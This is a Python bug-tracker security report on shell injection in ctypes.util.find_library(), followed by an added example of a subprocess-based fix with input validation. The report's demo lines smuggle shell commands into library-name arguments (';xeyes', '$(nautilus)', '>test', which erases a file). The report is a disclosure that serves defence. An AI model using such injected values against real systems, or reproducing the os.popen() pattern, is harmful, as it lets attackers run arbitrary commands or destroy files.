New submission from Bernd Dietzel: The find_library() function can execute code when special chars like ;|`<>$ are in the name. The "os.popen()" calls in the util.py script should be replaced with "subprocess.Popen()".
Demo Exploits for Linux :
====================

>>> from ctypes.util import find_library
>>> find_library(";xeyes")        # runs xeyes
>>> find_library("|xterm")        # runs terminal
>>> find_library("&gimp")         # runs gimp
>>> find_library("$(nautilus)")   # runs filemanager
>>> find_library(">test")         # creates, and if exists, erases a file "test"

==== Traceback ====

>>> find_library("`xmessage hello`")   # shows a message, press ctrl+c for Traceback
^CTraceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
    return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
  File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
    trace = f.read()
KeyboardInterrupt

https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068

----------
components: ctypes
files: workaround.diff
keywords: patch
messages: 255482
nosy: TheRegRunner
priority: normal
severity: normal
status: open
title: ctypes.util , Shell Injection in find_library()
type: security
versions: Python 2.7, Python 3.4
Added file: http://bugs.python.org/file41174/workaround.diff

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue25751>
_______________________________________

Python-bugs-list mailing list
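As an added illustration of the fix proposed in the report (this is not code from the report, from the attached workaround.diff, or from ctypes itself): the shell-string style that makes the name interpretable sits beside an argument-list style for subprocess, guarded by a library-name check. The gcc argument list is an assumption modelled on the probe ctypes runs, and echo_through_argv uses the Python interpreter in place of gcc so it runs without a compiler.

```python
import re
import subprocess
import sys

# Only characters that legitimately occur in shared-library names (c, stdc++,
# python3.4m, ...). Shell metacharacters such as ; | & $ ` < > and whitespace
# are rejected before the name reaches any external command.
_SAFE_LIBNAME = re.compile(r"^[A-Za-z0-9_.+-]+$")


def is_safe_library_name(name):
    """Return True when ``name`` is a plain library name, False otherwise."""
    return bool(_SAFE_LIBNAME.match(name))


def shell_string_probe(name):
    """The pattern the report describes: the name is spliced into a shell
    command string for os.popen(), so metacharacters in it are interpreted."""
    return "LANG=C LC_ALL=C gcc -Wl,-t -o /dev/null 2>&1 -l" + name


def argv_probe(name):
    """Hardened form: validate the name, then build an argument list for
    subprocess.Popen(). No shell is involved, so ';xeyes' would reach gcc as
    the single literal argument '-l;xeyes' (which gcc simply fails to find).
    The gcc options are an assumption, not the exact ctypes command."""
    if not is_safe_library_name(name):
        raise ValueError("refusing suspicious library name: %r" % name)
    return ["gcc", "-Wl,-t", "-o", "/dev/null", "-l" + name]


def echo_through_argv(name):
    """Show that an argv list delivers the name unchanged: run the current
    interpreter (standing in for gcc/ldconfig) and return the one argument it
    saw. Deliberately unvalidated so the metacharacter cases can be observed
    arriving as inert data rather than as shell syntax."""
    out = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", name],
        capture_output=True, text=True, check=True,
    )
    return out.stdout.rstrip("\n")


if __name__ == "__main__":
    for candidate in ("c", "stdc++", ";xeyes", "$(nautilus)", ">test"):
        print("%-14r safe=%-5s argv-delivered=%r" % (
            candidate, is_safe_library_name(candidate), echo_through_argv(candidate)))
```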